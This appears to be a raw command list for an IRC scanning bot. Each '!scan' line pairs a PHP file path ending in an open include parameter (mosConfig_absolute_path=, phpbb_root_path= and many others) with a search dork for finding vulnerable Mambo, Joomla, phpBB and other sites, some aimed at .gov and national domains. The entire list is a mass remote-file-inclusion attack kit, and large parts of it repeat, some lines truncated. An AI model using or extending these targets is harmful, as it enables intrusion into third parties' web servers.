!scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" *gov*
!scan /extensions/moblog/moblog_lib.php?basedir= "powered by pivot"
!scan /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2"
!scan components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= "AllMyGuests"
!scan /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= "com_rsgallery"
!scan /components/com_smf/smf.php?mosConfig_absolute_path= "com_smf"
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
!scan administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= "com_peoplebook"
!scan /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1"
!scan inc/cmses/aedating4CMS.php?dir[inc]= flashchat site:br bp_ncom.php?bnrep= "Script r?alis? par BinGo PHP"
!scan /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= "/com_mtree/"
!scan /jscript.php?my_ms[root]= intitle:"myspeach" "chat_exemple.php"
!scan /popup_window.php?site_isp_root= "Squirrelcart"
!scan /yabbse/Sources/Packages.php?sourcedir= Yabbse
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/ site:fr
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/ site:uk
!scan /includes/functions_portal.php?phpbb_root_path= "powered by Integramod"
!scan historytemplate.php?cms[support]=1&cms[tngpath]= "powered by The Next Generation of Genealogy Sitebuilding"
!scan /components/com_simpleboard/image_upload.php?sbp= "com_simpleboard"

!scan /surveys/survey.inc.php?path= surveys
!scan index.php?body= "index.php?body="
!scan /classes/adodbt/sql.php?classes_dir= adobt site:pl
!scan enc/content.php?Home_Path= "powered by doodle cart"
!scan /classified_right.php?language_dir= classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /embed/day.php?path= intitle:"Login to Calendar"
!scan /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /mcf.php?content= "mcf.php" site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= "com_facileforms" site:.ar
!scan skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
!scan /zipndownload.php?PP_PATH= "Powered by: PhotoPost"
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= "com_serverstat"
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= "index.php?option="com_zoom"
!scan /main.php?sayfa= "main.php?sayfa="
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= "/ubbthreads/"
!scan /header.php?abspath= "MobilePublisherPHP"
!scan components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= .com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= /TotalCalendar
!scan /login.php?dir= login.php?dir=
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php
!scan index.php?pageurl= "index.php?pageurl=*.php"
!scan /templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system
!scan index.php?var= "index.php?var=*.php"
!scan index.php?pagina= "index.php?pagina=*.php"
!scan index.php?go= "index.php?go="
!scan index.php?site= "index.php?site="
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "phpwcms/index.php?id="
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= ".com.*/index.php?option=com_comprofiler"
!scan index.php?pagina= "index.php?pagina=*.php"
!scan index.php?id= "index.php?id=*.php"
!scan index1.php?= "index1.php?=*.php?
!scan index.php?site= "index.php?site=*.php"
!scan main.php?id= "main.php?id=*.php"
!scan content.php?page= "content.php?page=*.php"
!scan admin.php?page= "admin.php?page=*.php"
!scan lib/gore.php?libpath= "/SQuery/"
!scan SQuery/lib/gore.php?libpath= "/SQuery/"
!scan index2.php?p= "index2.php?p=*.php"
!scan index1.php?go= "index1.php?go=*.php"
!scan news_detail.php?file= "news_detail.php?file=*.php"
!scan old_reports.php?file= "old_reports.php?file=*.php"
!scan index.php?x= "index.php?x=*.php"
!scan index.php?nic= "index.php?nic=*.php"
!scan homepage.php?sel= "homepage.php?sel=*.php"
!scan index.php?sel= "index.php?sel=*.php"
!scan main.php?x= "main.php?x=*.php"
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "com_artlinks"
!scan index2.php?x= index2.php?x=*.php"
!scan main.php?pagina= "main.php?pagina=*.php"
!scan test.php?page= test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
!scan akocomments.php?mosConfig_absolute_path= akocomments.php
!scan index.php?page= "edu/index.php?page=*.php"
!scan *.php?page= *.php?page=*.php"
!scan index.php?oldal= "index.php?oldal=*.php"
!scan index.php?lang=gr&file "index.php?lang=gr&file=*.php"
!scan index.php?pag= "index.php?pag=*.php"
!scan index.php?incl= "index.php?incl="
!scan avatar.php?page= "avatar.php?page="
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is"
!scan ndex.php?p= "edu/index.php?p=*.php"
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /xgallery/
!scan index.php?x= "com/index.php?x=*.php"
!scan index.php?mode= "com/index.php?mode=*.php"
!scan index.php?stranica= "index.php?stranica="
!scan index.php?sub= "il/index.php?sub=*.php"
!scan index.php?id= "/index.php?id=*.php"
!scan index.php?t= "/index.php?t=*.php"
!scan index.php?r= "index.php?r=*.php"
!scan index.php?menu= "net/index.php?menu=*.php"
!scan index.php?pag= "com/index.php?pag=*.php"
!scan solpot.html?body= "solpot.html?body"
!scan port.php?content= port.php?content=*.php"
!scan index0.php?show= index0.php?show=*.php"
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /index.php?option=com_comprofiler"
!scan /tools/send_reminders.php?includedir= day.php?date= /day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /index.php?option=com_comprofiler"
!scan content.php?page= "*content.php?page=*.php"
!scan index.php?topic= "/index.php?topic=*.php"
!scan index.php?u= "/index.php?u=*.php"
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= "com_linkdirectory"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= ".tr./components"
!scan modules/My_eGallery/index.php?basepath= "My_eGallery"
!scan /modules/vwar/admin/admin.php?vwar_root= "vwar"
!scan index.php?loc= .br/index.php?loc=
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= "us/index.php?option=com_comprofiler"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= "com_cropimage"
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php
!scan myevent.php?myevent_path= myevent.php
!scan /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= "com_uhp"
!scan myevent.php?myevent_path= "uk/myevent.php
!scan includes/functions.php?phpbb_root_path= powered by Integramod
!scan m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" "uk/tags.php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "us/index.php?option=com_remository
!scan show.php?path= fclick
!scan show.php?path= .ac.uk/fclick
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= ".de.*/com_linkdirectory"
!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= "com_a6mambocredits"
!scan index.php?template= "index.php?"
!scan search.php?cutepath= "search.php?"
!scan show_news.php?cutepath= "show_news.php?"
!scan page.php?doc= "page.php?doc="
!scan administrator/components/com_webring/admin.webring.docs.php?component_dir= "com_webring"
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= ".de.*/com_mgm"
!scan help.php?css_path= phplive site:.uk
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= "com_galleria/"
!scan big.php?pathtotemplate= ".de.*"big.php?"
!scan includes/search.php?GlobalSettings[templatesDirectory]= ".com"search.php?"
!scan interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS"
!scan /functions.php?include_path= "powered by: phpecard"
!scan modules/My_eGallery/index.php?basepath= ".de.*"My_eGallery"
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= ".net.*"com_galleria/"
!scan /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6"
!scan /class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3"
!scan /include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks"
!scan /squirrelcart/cart_content.php?cart_isp_root= /squirrelcart/
!scan index2.php?to= "/index2.php?to=*.php"
!scan index.php?load= "/index.php?load=*.php"
!scan home.php?pagina= "home.php?pagina="
!scan /modules/coppermine/include/init.inc.php?CPG_M_DIR= modules.php?name=coppermine
!scan /modules/Forums/admin/admin_styles.php?phpbb_root_path= modules.php?name=forums
!scan /modules/vwar/admin/admin.php?vwar_root= modules.php?name=vwar
!scan /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= modules.php?name=PNphpBB2
!scan /modules/My_eGallery/public/displayCategory.php?basepath= modules.php?name=my_egallery
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= modules.php?name=xgallery
!scan /modules/4nAlbum/public/displayCategory.php?basepath= modules.php?name=4nAlbum
!scan /include/write.php?dir= /zboard/zboard.php
!scan components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= "com_mtree"
!scan homepage.php?sel= "homepage.php?sel="
!scan /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /xoopsgallery/
!scan /modules/agendax/addevent.inc.php?agendax_path= /agendax/
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/
!scan /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan /squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /ppa/inc/functions.inc.php?config[ppa_root_path]= **/screens/displayimage.php?pid=*
!scan /spid/lang/lang.php?lang_path= **/spid.php **/spid.php?cat=*lang=
!scan /classes.php?LOCAL_PATH= "powered by siteframe"
!scan al_initialize.php?alpath= "Powered by AutoLinks Pro"
!scan /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= *br*/newbb_plus/*
!scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" *gov*
!scan /extensions/moblog/moblog_lib.php?basedir= "powered by pivot"
!scan /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2"
!scan components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= "AllMyGuests"
!scan /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= "com_rsgallery"
!scan /components/com_smf/smf.php?mosConfig_absolute_path= "com_smf"
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
!scan administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= "com_peoplebook"
!scan /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1"
!scan inc/cmses/aedating4CMS.php?dir[inc]= flashchat site:br bp_ncom.php?bnrep= "Script r?alis? par BinGo PHP"
!scan /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= "/com_mtree/"
!scan /jscript.php?my_ms[root]= intitle:"myspeach" "chat_exemple.php"
!scan /popup_window.php?site_isp_root= "Squirrelcart"
!scan /yabbse/Sources/Packages.php?sourcedir= Yabbse
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/ site:fr
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/ site:us
!scan /includes/functions_portal.php?phpbb_root_path= "powered by Integramod"
!scan /surveys/survey.inc.php?path= surveys
!scan index.php?body= "index.php?body="
!scan /classes/adodbt/sql.php?classes_dir= adobt site:us
!scan enc/content.php?Home_Path= "powered by doodle cart"
!scan /classified_right.php?language_dir= classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /embed/day.php?path= intitle:"Login to Calendar"
!scan /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /mcf.php?content= "mcf.php" site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= "com_facileforms" site:.ar
!scan skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
!scan /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= "com_serverstat"
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= "index.php?option="com_zoom"
!scan /main.php?sayfa= "main.php?sayfa="
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= "/ubbthreads/"
!scan /header.php?abspath= "MobilePublisherPHP"
!scan components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= .com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
!scan /tools/send_reminders.php?includedir=
!scan module_db.php?pivot_path= "module_db.php?pivot_path="
!scan /classes/adodbt/sql.php?classes_dir= "/classes/adodbt/sql.php?classes_dir="
!scan inc/cmses/aedatingCMS.php?dir[inc]= "flashchat"
!scan /modules/vwar/admin/admin.php?vwar_root= vwar
!scan bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= forum
!scan components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
!scan com_extended_registration
!scan index.php?RP_PATH= reviewpost
!scan index.php?pagename= phpquiz
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /com_remository/
!scan smarty_config.php?root_dir= "smarty"
!scan /components/com_forum/download.php?phpbb_root_path= com_forum
!scan include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter
!scan include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
!scan /classes/adodbt/sql.php?classes_dir= "index2.php?option=rss"
!scan send_reminders.php?includedir= "send_reminders.php?includedir="
!scan components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= com_rsgallery
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums" index.php
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= "com_cpg"
!scan [Script Path]/admin/index.php?o= "admin/index.php";
!scan /admin/index.php?o= "admin/index.php";
!scan index.php?menu=deti&page= "index.php?menu=deti&page"
!scan /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan SQuery/lib/gore.php?libpath= "/SQuery/"
!scan /components/com_simpleboard/image_upload.php?sbp= "com_simpleboard"
!scan m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
!scan /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
!scan /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
!scan components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
!scan admin/doeditconfig.php?thispath=../includes&config[path]= "admin"
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan SQuery/lib/gore.php?libpath= "/SQuery/"
!scan /components/com_simpleboard/image_upload.php?sbp= "com_simpleboard"
!scan m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
!scan wamp_dir/setup/yesno.phtml?no_url= "setup"
!scan components/com_simpleboard/image_upload.php?sbp= "com_simpleboard"
!scan /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
!scan smarty_config.php?root_dir= "smarty"
!scan /components/com_forum/download.php?phpbb_root_path= com_forum
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= "com_cpg"
!scan [Script Path]/admin/index.php?o= "admin/index.php"
!scan /admin/index.php?o= "admin/index.php"
!scan index.php?menu=deti&page= "index.php?menu=deti&page"
!scan include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter
!scan /classes/adodbt/sql.php?classes_dir= "index2.php?option=rss"
!scan send_reminders.php?includedir= "send_reminders.php?includedir="
!scan components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= com_rsgallery
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums" index.php
!scan components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
!scan index.php?RP_PATH= reviewpost
!scan index.php?pagename= phpquiz
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /com_remository/
!scan /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan SQuery/lib/gore.php?libpath= "/SQuery/"
!scan m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
!scan /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
!scan /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
!scan components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
!scan admin/doeditconfig.php?thispath=../includes&config[path]= "admin"
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
 